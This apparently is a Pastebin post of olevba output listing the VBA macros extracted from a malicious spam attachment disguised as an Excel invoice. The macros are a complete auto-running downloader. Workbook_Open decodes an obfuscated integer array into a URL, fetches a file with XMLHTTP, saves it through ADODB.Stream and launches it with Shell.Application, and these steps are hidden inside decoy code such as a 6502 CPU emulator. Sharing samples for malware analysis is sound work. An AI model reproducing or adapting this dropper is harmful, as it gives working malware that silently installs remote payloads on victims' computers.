API tools faq
paste
Advertisement
dynamoo

Malicious Excel macro

dynamoo
Nov 24th, 2015
438
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 28.09 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V invoice_1366976_08-01-13-04.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoice_1366976_08-01-13-04.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Private Sub Workbook_Open()
  16. PreencherDireita "", "", 0
  17. runAlleStatMod
  18. txs6502
  19. rora6502
  20. IsDigit ""
  21. End Sub
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Ëèñò1.cls
  31. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. (empty macro)
  34. -------------------------------------------------------------------------------
  35. VBA MACRO Ëèñò2.cls
  36. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. (empty macro)
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Ëèñò3.cls
  41. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Module1.bas
  46. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. Public Const ads = "Adodb.Stream"
  49. Public Const sha = "Shell.Application"
  50. Public Const wss = "WScript.Shell"
  51. Public Const ps = "Process"
  52. Public Function FormatarTexto(ByVal texto As String, ParamArray formatos() As Variant) As String
  53.  Dim i As Long
  54.  Dim formats_size As Integer
  55.  Dim formated_text As String
  56.  Dim text_size As Integer
  57.  Dim tokens() As String
  58.  Dim ch As String
  59.  Dim format_token_position_string As String
  60.  Dim format_token_position As Integer
  61.  Dim is_digit As Boolean
  62.  Dim lower_bound As Integer
  63.  Dim formato() As Variant
  64.  Dim sub_formato() As Variant
  65.  Dim last_dimenssion As Integer
  66.  formato = formatos
  67.  On Error GoTo Singl
  68.  For i = 0 To 60000
  69.  sub_formato = formato(0)
  70.  formato = sub_formato
  71.  Next i
  72. Multi:
  73.  formato = formatos(0)
  74. Singl:
  75.  On Error GoTo 0
  76.  i = 1
  77.  formats_size = UBound(formato)
  78.  text_size = Len(texto)
  79.  If formats_size = 0 Then
  80.  formated_text = texto
  81.  GoTo Finally
  82.  End If
  83.  Do While i <= text_size
  84.  ch = Mid(texto, i, 1)
  85.  If ch = "$" Then
  86.  format_token_position_string = ""
  87.  i = i + 1
  88.  Do While i <= text_size
  89.  ch = Mid(texto, i, 1)
  90.  is_digit = IsDigit(ch)
  91.  If is_digit Then
  92.  format_token_position_string = ch & format_token_position_string
  93.  End If
  94.  If Not is_digit Or i = text_size Then
  95.  format_token_position = CInt(format_token_position_string) - 1
  96.  If format_token_position <= formats_size Then
  97.  formated_text = formated_text & CStr(formato(format_token_position)) + ch
  98.  Else
  99.  formated_text = formated_text & "$" & CStr(format_token_position - formats_size) + ch
  100.  End If
  101.  Exit Do
  102.  End If
  103.  i = i + 1
  104.  Loop
  105.  Else
  106.  formated_text = formated_text & ch
  107.  End If
  108.  i = i + 1
  109.  Loop
  110.  GoTo Finally
  111. Catch:
  112.  formated_text = Err.Description
  113. Finally:
  114.  FormatarTexto = formated_text
  115. End Function
  116. Public Function phy650_3_3(phy650_3_1() As Variant, phy650_3_2 As Integer) As String
  117.     Dim i As Integer
  118.     Dim result As String
  119.     result = ""
  120.     For i = LBound(phy650_3_1) To UBound(phy650_3_1)
  121.         result = result & Chr(phy650_3_1(i) - phy650_3_2 - 2845)
  122.     Next i
  123.     phy650_3_3 = result
  124. End Function
  125. Public Function PreencherEsquerda( _
  126.  ByVal texto As String, _
  127.  ByVal caracter_a_preencher As String, _
  128.  ByVal tamanho_final As Integer, _
  129.  Optional truncar As Boolean _
  130. ) As String
  131.  Dim novo_texto As String
  132.  Dim quantidade_a_adicionar As Integer
  133.  novo_texto = texto
  134.  quantidade_a_adicionar = tamanho_final - Len(texto)
  135.  If quantidade_a_adicionar < 0 Then
  136.  If truncar Then
  137.  novo_texto = Mid(texto, 1, tamanho_final)
  138.  End If
  139.  GoTo Finally
  140.  End If
  141.  novo_texto = Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher) + novo_texto
  142. Catch:
  143. Finally:
  144.  PreencherEsquerda = novo_texto
  145. End Function
  146. Function PreencherDireita( _
  147.  ByVal texto As String, _
  148.  ByVal caracter_a_preencher As String, _
  149.  ByVal tamanho_final As Integer, _
  150.  Optional truncar As Boolean _
  151. )
  152.  Dim novo_texto As String
  153.  Dim quantidade_a_adicionar As Integer
  154. Set phy65007 = CreateObject("Microsoft" + ".XMLHTTP")
  155. Dim urlAr() As Variant
  156. urlAr = Array(2990, 3002, 3002, 2998, 2944, 2933, 2933, 3004, 2991, 2994, 2994, 2995, 2983, 3000, 2993, 3001, 2990, 2987, 3001, 3002, 2932, 2996, 2997, 2933, 2941, 2941, 2938, 2939, 2989, 2986, 2933, 2938, 2986, 2989, 3000, 2989, 2986, 2989, 2932, 2987, 3006, 2987)
  157. phy65007.Open "GET", phy650_3_3(urlAr, 41), False
  158.  novo_texto = texto
  159.  quantidade_a_adicionar = tamanho_final - Len(texto)
  160.  If quantidade_a_adicionar < 0 Then
  161.  If truncar Then
  162.  novo_texto = Mid(texto, 1, tamanho_final)
  163.  End If
  164.  GoTo Finally
  165.  End If
  166.  novo_texto = novo_texto + Replace(Space(quantidade_a_adicionar), " ", caracter_a_preencher)
  167. Catch:
  168. Finally:
  169.  PreencherDireita = novo_texto
  170. End Function
  171. Function RGB( _
  172.  ByVal red As Integer, _
  173.  ByVal green As Integer, _
  174.  ByVal blue As Integer _
  175. ) As Long
  176.  RGB = VBA.Information.RGB(red, green, blue)
  177. End Function
  178. Public Function Juntar( _
  179.  ByVal separador As String, _
  180.  ParamArray elementos() As Variant _
  181. ) As String
  182.  Juntar = Join(elementos, separador)
  183. End Function
  184. Public Function IsDigit(ByVal ch As String) As Boolean
  185. phy650003. _
  186. Open (phy650002)
  187. Exit Function
  188.  Dim asc_code As Integer
  189.  asc_code = Asc(ch)
  190.  IsDigit = (asc_code > 48 And asc_code < 58)
  191. End Function
  192.  
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199.  
  200. -------------------------------------------------------------------------------
  201. VBA MACRO Module2.bas
  202. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  203. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  204. Public phy65007 As Object
  205. Public phy65008 As Object
  206. Public phy65009  As Object
  207. Public phy650001 As String
  208. Public phy650002 As String
  209. Public phy650003 As Object
  210. Public Sub runAlleStatMod()
  211.  Dim kuerzel As Variant
  212.  Dim nameTN As Variant
  213.  Set phy65008 = CreateObject(ads)
  214.  Set phy650003 = CreateObject(sha)
  215.  
  216. Set phy65009 = CreateObject(wss).Environment(ps)
  217. Exit Sub
  218.  setzteBezugsjah.rImStatischenModell
  219.  erstelleKo.pfzeileMETA
  220.  erstelleMi.ttelwerteMETA
  221.  For Each kuerzel In gibAlleTN_Kuerzel
  222.  If kuerzel = "SH" Or kuerzel = "AG" Then
  223.  Else
  224.  nameTN = gibT.Nname(kuerzel)
  225.  runSFA nameTN
  226.  exportiereSta.tischeResultateSFA nameTN
  227.  erstelleP.DFundPNG nameTN
  228.  End If
  229.  Next kuerzel
  230.  If TEST = False Then _
  231.  MsgBox "Die statischen Modelle sind fertig bearbeitet." & vbNewLine & _
  232.  "Die Kantone AG und SH wurden nicht berechnet.", vbInformation
  233. End Sub
  234. Sub runEinStatMod()
  235.  Dim nameTN As String
  236.  setzteBezugsjahrImStatischenModell
  237.  nameTN = gibAlleOderNameTN
  238.  runSFA nameTN
  239. End Sub
  240. Sub runSFA(ByVal nameTN As String)
  241.  Dim wbSFA As String
  242.  Dim pfadSFA As String
  243.  pfadSFA = gibPfadZumStat_Modell & gibName_Statisches_Modell
  244.  Application.ScreenUpdating = False
  245.  Application.StatusBar = True
  246.  Application.StatusBar = "Es wird " & nameTN & " bearbeitet."
  247.  kopiereDefault_stat nameTN, gibBezugsjahr
  248.  kopiereAngabenTN nameTN
  249.  On Error Resume Next
  250.  Set wbSFA = Workbooks(pfadSFA)
  251.  If wbSFA Is Nothing Then _
  252.  Set wbSFA = Workbooks.Open(pfadSFA)
  253.  setzeAlleineOderAlleImModell wbSFA
  254.  importiereDefaultwerteInsModell wbSFA
  255.  importiereDATAinsModell wbSFA
  256.  kopiereDefaultWerteImModell wbSFA
  257.  Application.Run ""
  258.  Application.Run ""
  259.  Application.Run ""
  260.  Application.StatusBar = ""
  261.  Application.ScreenUpdating = True
  262.  If gibAlleOderNameTN <> "Alle" Then
  263.  wbSFA.Activate
  264.  wbSFA.Save
  265.  If TEST = False Then
  266.  MsgBox "Das Modell kann nun bearbeitet werden. " & _
  267.  "Ge?nderte Default-Werte werden beim Schliessen exportiert.", vbInformation
  268.  End If
  269.  End
  270.  Else
  271.  wbSFA.Close SaveChanges:=True
  272.  Set wbSFA = Nothing
  273.  End If
  274. End Sub
  275. Private Sub importiereDefaultwerteInsModell(wbModell As String)
  276.  Dim wbDefault As String
  277.  Dim wsModell As Worksheet
  278.  Dim wsWerte As Worksheet
  279.  Dim LETZTE_ZEILE_PARAMETER As Integer
  280.  LETZTE_ZEILE_PARAMETER = 52
  281.  On Error Resume Next
  282.  Set wbDefault = Workbooks.Open(gibPfadZumStat_Modell & "Default_stat.dDATA")
  283.  Set wsWerte = wbDefault.Worksheets("Tabelle1")
  284.  Set wsModell = Workbooks(gibName_Statisches_Modell).Worksheets(".Default")
  285.  wsWerte.Range("E1:E" & LETZTE_ZEILE_PARAMETER).Copy
  286.  wsModell.Range("F1:F" & LETZTE_ZEILE_PARAMETER).PasteSpecial xlPasteValues
  287.  Application.CutCopyMode = False
  288.  wsWerte.Range("N1:N27").Copy
  289.  wsModell.Range("N1:N27").PasteSpecial xlPasteValues
  290.  Application.CutCopyMode = False
  291.  wbDefault.Close
  292.  Set wbDefault = Nothing
  293. End Sub
  294. Private Sub importiereDATAinsModell(wbModell As String)
  295.  Dim wbVon, wbNach As String
  296.  Dim wsVon, wsNach As Worksheet
  297.  Set wbVon = Workbooks.Open(gibPfadZumStat_Modell & "\DATA_stat.xls")
  298.  Set wbNach = wbModell
  299.  Set wsNach = wbModell.Worksheets("Bauwerk")
  300.  Set wsVon = wbVon.Worksheets("HB_GebVol")
  301.  wsVon.Range("B2:G7").Copy
  302.  wsNach.Range("C4:H9").PasteSpecial xlPasteValues
  303.  Set wsVon = wbVon.Worksheets("HB_Material")
  304.  wsVon.Range("B2:G9").Copy
  305.  wsNach.Range("C14:H21").PasteSpecial xlPasteValues
  306.  Set wsVon = wbVon.Worksheets("HB_Mat_Neubau")
  307.  wsVon.Range("B2:G9").Copy
  308.  wsNach.Range("C26:H33").PasteSpecial xlPasteValues
  309.  Set wsVon = wbVon.Worksheets("TB")
  310.  wsVon.Range("B10:I12").Copy
  311.  wsNach.Range("C37:E44").PasteSpecial Paste:=xlPasteValues, Transpose:=True
  312.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
  313.  Set wsNach = wbNach.Worksheets(".Fluesse")
  314.  wsVon.Range("E4:G25").Copy
  315.  wsNach.Range("D4:F25").PasteSpecial xlPasteValues
  316.  Set wsVon = wbVon.Worksheets("Angaben_Materialfluesse")
  317.  Set wsNach = wbNach.Worksheets(".Params")
  318.  wsVon.Range("E23:E24").Copy
  319.  wsNach.Range("F4:F5").PasteSpecial xlPasteValues
  320.  Application.CutCopyMode = False
  321.  wbVon.Close
  322.  Set wsNach = wbNach.Sheets(".Default")
  323.  wsNach.Range("F26").FormulaLocal = "="
  324.  wsNach.Range("F27").FormulaLocal = "="
  325.  wsNach.Range("F28").FormulaLocal = "="
  326.  wsNach.Range("F29").FormulaLocal = "="
  327.  wsNach.Range("F31").FormulaLocal = "="
  328.  wsNach.Range("F32").FormulaLocal = "="
  329.  wsNach.Range("F33").FormulaLocal = "="
  330.  wsNach.Range("F34").FormulaLocal = "="
  331.  Set wbVon = Nothing
  332.  Set wbNach = Nothing
  333. End Sub
  334. Private Sub kopiereDefaultWerteImModell(wbModell As String)
  335.  Dim wsVon As Worksheet, wsNach As Worksheet
  336.  Set wsVon = wbModell.Sheets(".Default")
  337.  Set wsNach = wbModell.Sheets("Variablen")
  338.  wsVon.Visible = True
  339.  wsNach.Range("G1:G52").Value = wsVon.Range("F1:F52").Value
  340.  wsVon.Visible = False
  341. End Sub
  342.  
  343.  
  344.  
  345.  
  346.  
  347.  
  348.  
  349.  
  350. -------------------------------------------------------------------------------
  351. VBA MACRO Module3.bas
  352. in file: invoice_1366976_08-01-13-04.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  353. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  354.  
  355. ' This is where all 6502 instructions are kept.
  356. Public Sub adc6502()
  357.  Dim tmp As Long ' Integer
  358. adrmode opcode
  359.  Value = Read6502(savepc)
  360.  saveflags = (P And &H1)
  361.  Sum = A
  362.  Sum = (Sum + Value) And &HFF
  363.  Sum = (Sum + saveflags) And &HFF
  364.  If (Sum > &H7F) Or (Sum < -&H80) Then
  365.  P = P Or &H40
  366.  Else
  367.  P = (P And &HBF)
  368.  End If
  369.  Sum = A + (Value + saveflags)
  370.  If (Sum > &HFF) Then
  371.  P = P Or &H1
  372.  Else
  373.  P = (P And &HFE)
  374.  End If
  375.  A = Sum And &HFF
  376.  If (P And &H8) Then
  377.  P = (P And &HFE)
  378.  If ((A And &HF) > &H9) Then
  379.  A = (A + &H6) And &HFF
  380.  End If
  381.  If ((A And &HF0) > &H90) Then
  382.  A = (A + &H60) And &HFF
  383.  P = P Or &H1
  384.  End If
  385.  Else
  386.  clockticks6502 = clockticks6502 + 1
  387.  End If
  388.  SetFlags A
  389. End Sub
  390. Public Sub adrmode(opcode As Byte)
  391. Select Case addrmode(opcode)
  392.  Case ADR_ABS: savepc = Read6502(PC) + (Read6502(PC + 1) * &H100&): PC = PC + 2
  393.  Case ADR_ABSX: absx6502
  394.  Case ADR_ABSY: absy6502
  395.  Case ADR_IMP: ' nothing really necessary cause implied6502 = ""
  396. Case ADR_IMM: savepc = PC: PC = PC + 1
  397.  Case ADR_INDABSX: indabsx6502
  398.  Case ADR_IND: indirect6502
  399.  Case ADR_INDX: indx6502
  400.  Case ADR_INDY: indy6502
  401.  Case ADR_INDZP: indzp6502
  402.  Case ADR_REL: savepc = Read6502(PC): PC = PC + 1: If (savepc And &H80) Then savepc = savepc - &H100&
  403.  Case ADR_ZP: savepc = Read6502(PC): savepc = savepc And &HFF: PC = PC + 1
  404.  Case ADR_ZPX: zpx6502
  405.  Case ADR_ZPY: zpy6502
  406.  Case Else: Debug.Print addrmode(opcode)
  407. End Select
  408. End Sub
  409. Public Sub and6502()
  410.  adrmode opcode
  411.  Value = Read6502(savepc)
  412.  A = (A And Value)
  413.  SetFlags A
  414. End Sub
  415. Public Sub asl6502()
  416.  adrmode opcode
  417.  Value = Read6502(savepc)
  418.  P = (P And &HFE) Or ((Value \ 128) And &H1)
  419.  Value = (Value * 2) And &HFF
  420.  Write6502 savepc, (Value And &HFF)
  421.  SetFlags Value
  422. End Sub
  423. Public Sub asla6502()
  424.  P = (P And &HFE) Or ((A \ 128) And &H1)
  425.  A = (A * 2) And &HFF
  426.  SetFlags A
  427. End Sub
  428. Public Sub bcc6502()
  429.  If ((P And &H1) = 0) Then
  430.  adrmode opcode
  431.  PC = PC + savepc
  432.  clockticks6502 = clockticks6502 + 1
  433.  Else
  434.  PC = PC + 1
  435.  End If
  436. End Sub
  437. Public Sub bcs6502()
  438.  If (P And &H1) Then
  439.  adrmode opcode
  440.  PC = PC + savepc
  441.  clockticks6502 = clockticks6502 + 1
  442.  Else
  443.  PC = PC + 1
  444.  End If
  445. End Sub
  446. Public Sub beq6502()
  447.  If (P And &H2) Then
  448.  adrmode opcode
  449.  PC = PC + savepc
  450.  clockticks6502 = clockticks6502 + 1
  451.  Else
  452.  PC = PC + 1
  453.  End If
  454. End Sub
  455. Public Sub bit6502()
  456.  adrmode opcode
  457.  Value = Read6502(savepc)
  458.  If (Value And A) Then
  459.  P = (P And &HFD)
  460.  Else
  461.  P = P Or &H2
  462.  End If
  463.  P = ((P And &H3F) Or (Value And &HC0))
  464. End Sub
  465. Public Sub bmi6502()
  466.  If (P And &H80) Then
  467.  adrmode opcode
  468.  PC = PC + savepc
  469.  clockticks6502 = clockticks6502 + 1
  470.  Else
  471.  PC = PC + 1
  472.  End If
  473. End Sub
  474. Public Sub bne6502()
  475.  If ((P And &H2) = 0) Then
  476.  adrmode opcode
  477.  PC = PC + savepc
  478.  Else
  479.  PC = PC + 1
  480.  End If
  481. End Sub
  482. Public Sub bpl6502()
  483.  If ((P And &H80) = 0) Then
  484.  adrmode opcode
  485.  PC = PC + savepc
  486.  Else
  487.  PC = PC + 1
  488.  End If
  489. End Sub
  490. Public Sub brk6502()
  491.  PC = PC + 1
  492.  Write6502 &H100& + s, (PC \ &H100&) And &HFF
  493.  s = (s - 1) And &HFF
  494.  Write6502 &H100& + s, (PC And &HFF)
  495.  s = (s - 1) And &HFF
  496.  Write6502 &H100& + s, P
  497.  s = (s - 1) And &HFF
  498.  P = P Or &H14
  499.  PC = Read6502(&HFFFE&) + (Read6502(&HFFFF&) * &H100&)
  500. End Sub
  501. Public Sub bvc6502()
  502.  If ((P And &H40) = 0) Then
  503.  adrmode opcode
  504.  PC = PC + savepc
  505.  clockticks6502 = clockticks6502 + 1
  506.  Else
  507.  PC = PC + 1
  508.  End If
  509. End Sub
  510. Public Sub bvs6502()
  511.  If (P And &H40) Then
  512.  adrmode opcode
  513.  PC = PC + savepc
  514.  clockticks6502 = clockticks6502 + 1
  515.  Else
  516.  PC = PC + 1
  517.  End If
  518. End Sub
  519. Public Sub clc6502()
  520.  P = P And &HFE
  521. End Sub
  522. Public Sub cld6502()
  523.  P = P And &HF7
  524. End Sub
  525. Public Sub cli6502()
  526.  P = P And &HFB
  527. End Sub
  528. Public Sub clv6502()
  529.  P = P And &HBF
  530. End Sub
  531. Public Sub cmp6502()
  532.  adrmode opcode
  533.  Value = Read6502(savepc)
  534.  If (A + &H100 - Value) > &HFF Then
  535.  P = P Or &H1
  536.  Else
  537.  P = (P And &HFE)
  538.  End If
  539.  Value = (A + &H100 - Value) And &HFF
  540.  SetFlags Value
  541. End Sub
  542. Public Sub cpx6502()
  543.  adrmode opcode
  544.  Value = Read6502(savepc)
  545.  If (X + &H100 - Value > &HFF) Then
  546.  P = P Or &H1
  547.  Else
  548.  P = (P And &HFE)
  549.  End If
  550.  Value = (X + &H100 - Value) And &HFF
  551.  SetFlags Value
  552. End Sub
  553. Public Sub cpy6502()
  554.  adrmode opcode
  555.  Value = Read6502(savepc)
  556.  If (Y + &H100 - Value > &HFF) Then
  557.  P = (P Or &H1)
  558.  Else
  559.  P = (P And &HFE)
  560.  End If
  561.  Value = (Y + &H100 - Value) And &HFF
  562.  SetFlags Value
  563. End Sub
  564. Public Sub dec6502()
  565.  adrmode opcode
  566.  Write6502 (savepc), (Read6502(savepc) - 1) And &HFF
  567.  Value = Read6502(savepc)
  568.  If (Value) Then
  569.  P = P And &HFD
  570.  Else
  571.  P = P Or &H2
  572.  End If
  573.  If (Value And &H80) Then
  574.  P = P Or &H80
  575.  Else
  576.  P = P And &H7F
  577.  End If
  578. End Sub
  579. Public Sub dex6502()
  580.  X = (X - 1) And &HFF
  581.  If (X) Then
  582.  P = P And &HFD
  583.  Else
  584.  P = P Or &H2
  585.  End If
  586.  If (X And &H80) Then
  587.  P = P Or &H80
  588.  Else
  589.  P = P And &H7F
  590.  End If
  591. End Sub
  592. Public Sub dey6502()
  593.  Y = (Y - 1) And &HFF
  594.  If (Y) Then
  595.  P = P And &HFD
  596.  Else
  597.  P = P Or &H2
  598.  End If
  599.  If (Y And &H80) Then
  600.  P = P Or &H80
  601.  Else
  602.  P = P And &H7F
  603.  End If
  604. End Sub
  605. Public Sub eor6502()
  606.  adrmode opcode
  607.  A = A Xor Read6502(savepc)
  608.  If (A) Then
  609.  P = P And &HFD
  610.  Else
  611.  P = P Or &H2
  612.  End If
  613.  If (A And &H80) Then
  614.  P = P Or &H80
  615.  Else
  616.  P = P And &H7F
  617.  End If
  618. End Sub
  619. Public Sub inc6502()
  620.  adrmode opcode
  621.  Write6502 (savepc), (Read6502(savepc) + 1) And &HFF
  622.  Value = Read6502(savepc)
  623.  If (Value) Then
  624.  P = P And &HFD
  625.  Else
  626.  P = P Or &H2
  627.  End If
  628.  If (Value And &H80) Then
  629.  P = P Or &H80
  630.  Else
  631.  P = P And &H7F
  632.  End If
  633. End Sub
  634. Public Sub inx6502()
  635.  X = (X + 1) And &HFF
  636.  If (X) Then
  637.  P = P And &HFD
  638.  Else
  639.  P = P Or &H2
  640.  End If
  641.  If (X And &H80) Then
  642.  P = P Or &H80
  643.  Else
  644.  P = P And &H7F
  645.  End If
  646. End Sub
  647. Public Sub iny6502()
  648.  Y = (Y + 1) And &HFF
  649.  If (Y) Then
  650.  P = P And &HFD
  651.  Else
  652.  P = P Or &H2
  653.  End If
  654.  If (Y And &H80) Then
  655.  P = P Or &H80
  656.  Else
  657.  P = P And &H7F
  658.  End If
  659. End Sub
  660. Public Sub jmp6502()
  661.  adrmode opcode
  662.  PC = savepc
  663. End Sub
  664. Public Sub jsr6502()
  665.  PC = PC + 1
  666.  Write6502 s + &H100&, (PC \ &H100&)
  667.  s = (s - 1) And &HFF
  668.  Write6502 s + &H100&, (PC And &HFF)
  669.  s = (s - 1) And &HFF
  670.  PC = PC - 1
  671.  adrmode opcode
  672.  PC = savepc
  673. End Sub
  674. Public Sub lda6502()
  675.  adrmode opcode
  676.  A = Read6502(savepc)
  677.  If (A) Then
  678.  P = P And &HFD
  679.  Else
  680.  P = P Or &H2
  681.  End If
  682.  If (A And &H80) Then
  683.  P = P Or &H80
  684.  Else
  685.  P = P And &H7F
  686.  End If
  687. End Sub
  688. Public Sub ldx6502()
  689.  adrmode opcode
  690.  X = Read6502(savepc)
  691.  If (X) Then
  692.  P = P And &HFD
  693.  Else
  694.  P = P Or &H2
  695.  End If
  696.  If (X And &H80) Then
  697.  P = P Or &H80
  698.  Else
  699.  P = P And &H7F
  700.  End If
  701. End Sub
  702. Public Sub ldy6502()
  703.  adrmode opcode
  704.  Y = Read6502(savepc)
  705.  If (Y) Then
  706.  P = P And &HFD
  707.  Else
  708.  P = P Or &H2
  709.  End If
  710.  If (Y And &H80) Then
  711.  P = P Or &H80
  712.  Else
  713.  P = P And &H7F
  714.  End If
  715. End Sub
  716. Public Sub lsr6502()
  717.  adrmode opcode
  718.  Value = Read6502(savepc)
  719.  P = ((P And &HFE) Or (Value And &H1))
  720.  Value = (Value \ 2) And &HFF
  721.  Write6502 savepc, (Value And &HFF)
  722.  If (Value) Then
  723.  P = P And &HFD
  724.  Else
  725.  P = P Or &H2
  726.  End If
  727.  If (Value And &H80) Then
  728.  P = P Or &H80
  729.  Else
  730.  P = P And &H7F
  731.  End If
  732. End Sub
  733. Public Sub lsra6502()
  734.  P = (P And &HFE) Or (A And &H1)
  735.  A = (A \ 2) And &HFF
  736.  If (A) Then
  737.  P = P And &HFD
  738.  Else
  739.  P = P Or &H2
  740.  End If
  741.  If (A And &H80) Then
  742.  P = P Or &H80
  743.  Else
  744.  P = P And &H7F
  745.  End If
  746. End Sub
  747. Public Sub nop6502()
  748. 'TS: Implemented complex code structure ;)
  749. End Sub
  750. Public Sub ora6502()
  751.  adrmode opcode
  752.  A = A Or Read6502(savepc)
  753.  If (A) Then
  754.  P = P And &HFD
  755.  Else
  756.  P = P Or &H2
  757.  End If
  758.  If (A And &H80) Then
  759.  P = P Or &H80
  760.  Else
  761.  P = P And &H7F
  762.  End If
  763. End Sub
  764. Public Sub pha6502()
  765.  Write6502 &H100& + s, A
  766.  s = (s - 1) And &HFF
  767. End Sub
  768. Public Sub php6502()
  769.  Write6502 &H100& + s, P
  770.  s = (s - 1) And &HFF
  771. End Sub
  772. Public Sub pla6502()
  773.  s = (s + 1) And &HFF
  774.  A = Read6502(s + &H100)
  775.  If (A) Then
  776.  P = P And &HFD
  777.  Else
  778.  P = P Or &H2
  779.  End If
  780.  If (A And &H80) Then
  781.  P = P Or &H80
  782.  Else
  783.  P = P And &H7F
  784.  End If
  785. End Sub
  786. Public Sub plp6502()
  787.  s = (s + 1) And &HFF
  788.  P = Read6502(s + &H100) Or &H20
  789. End Sub
  790. Public Sub rol6502()
  791.  saveflags = (P And &H1)
  792.  adrmode opcode
  793.  Value = Read6502(savepc)
  794.  P = (P And &HFE) Or ((Value \ 128) And &H1)
  795.  Value = (Value * 2) And &HFF
  796.  Value = Value Or saveflags
  797.  Write6502 savepc, (Value And &HFF)
  798.  If (Value) Then
  799.  P = P And &HFD
  800.  Else
  801.  P = P Or &H2
  802.  End If
  803.  If (Value And &H80) Then
  804.  P = P Or &H80
  805.  Else
  806.  P = P And &H7F
  807.  End If
  808. End Sub
  809. Public Sub rola6502()
  810.  saveflags = (P And &H1)
  811.  P = (P And &HFE) Or ((A \ 128) And &H1)
  812.  A = (A * 2) And &HFF
  813.  A = A Or saveflags
  814.  If (A) Then
  815.  P = P And &HFD
  816.  Else
  817.  P = P Or &H2
  818.  End If
  819.  If (A And &H80) Then
  820.  P = P Or &H80
  821.  Else
  822.  P = P And &H7F
  823.  End If
  824. End Sub
  825. Public Sub ror6502()
  826.  saveflags = (P And &H1)
  827.  adrmode opcode
  828.  Value = Read6502(savepc)
  829.  P = (P And &HFE) Or (Value And &H1)
  830.  Value = (Value \ 2) And &HFF
  831.  If (saveflags) Then
  832.  Value = Value Or &H80
  833.  End If
  834.  Write6502 (savepc), Value And &HFF
  835.  If (Value) Then
  836.  P = P And &HFD
  837.  Else
  838.  P = P Or &H2
  839.  End If
  840.  If (Value And &H80) Then
  841.  P = P Or &H80
  842.  Else
  843.  P = P And &H7F
  844.  End If
  845. End Sub
  846. Public Sub rora6502()
  847.  
  848. Dim rti6611 As Variant
  849. rti6611 = phy65007.responseBody
  850. Dim rti6612 As Integer
  851. rti6612 = 3 - 1
  852.     phy65008.write rti6611
  853.     phy65008.savetofile phy650002, rti6612
  854. Exit Sub
  855.  saveflags = (P And &H1)
  856.  P = (P And &HFE) Or (A And &H1)
  857.  A = (A \ 2) And &HFF
  858.  If (saveflags) Then
  859.  A = A Or &H80
  860.  End If
  861.  If (A) Then
  862.  P = P And &HFD
  863.  Else
  864.  P = P Or &H2
  865.  End If
  866.  If (A And &H80) Then
  867.  P = P Or &H80
  868.  Else
  869.  P = P And &H7F
  870.  End If
  871. End Sub
  872. Public Sub rti6502()
  873.  
  874.  s = (s + 1) And &HFF
  875.  P = Read6502(s + &H100&) Or &H20
  876.  s = (s + 1) And &HFF
  877.  PC = Read6502(s + &H100&)
  878.  s = (s + 1) And &HFF
  879.  PC = PC + (Read6502(s + &H100) * &H100&)
  880. End Sub
  881. Public Sub rts6502()
  882.  s = (s + 1) And &HFF
  883.  PC = Read6502(s + &H100)
  884.  s = (s + 1) And &HFF
  885.  PC = PC + (Read6502(s + &H100) * &H100&)
  886.  PC = PC + 1
  887. End Sub
  888. Public Sub sbc6502()
  889.  adrmode opcode
  890.  Value = Read6502(savepc) Xor &HFF
  891.  saveflags = (P And &H1)
  892.  Sum = A
  893.  Sum = (Sum + Value) And &HFF
  894.  Sum = (Sum + (saveflags * 16)) And &HFF
  895.  If ((Sum > &H7F) Or (Sum <= -&H80)) Then
  896.  P = P Or &H40
  897.  Else
  898.  P = P And &HBF
  899.  End If
  900.  Sum = A + (Value + saveflags)
  901.  If (Sum > &HFF) Then
  902.  P = P Or &H1
  903.  Else
  904.  P = P And &HFE
  905.  End If
  906.  A = Sum And &HFF
  907.  If (P And &H8) Then
  908.  A = (A - &H66) And &HFF
  909.  P = P And &HFE
  910.  If ((A And &HF) > &H9) Then
  911.  A = (A + &H6) And &HFF
  912.  End If
  913.  If ((A And &HF0) > &H90) Then
  914.  A = (A + &H60) And &HFF
  915.  P = P Or &H1
  916.  End If
  917.  Else
  918.  clockticks6502 = clockticks6502 + 1
  919.  End If
  920.  'Debug.Print "sbc6502"
  921. If (A) Then
  922.  P = P And &HFD
  923.  Else
  924.  P = P Or &H2
  925.  End If
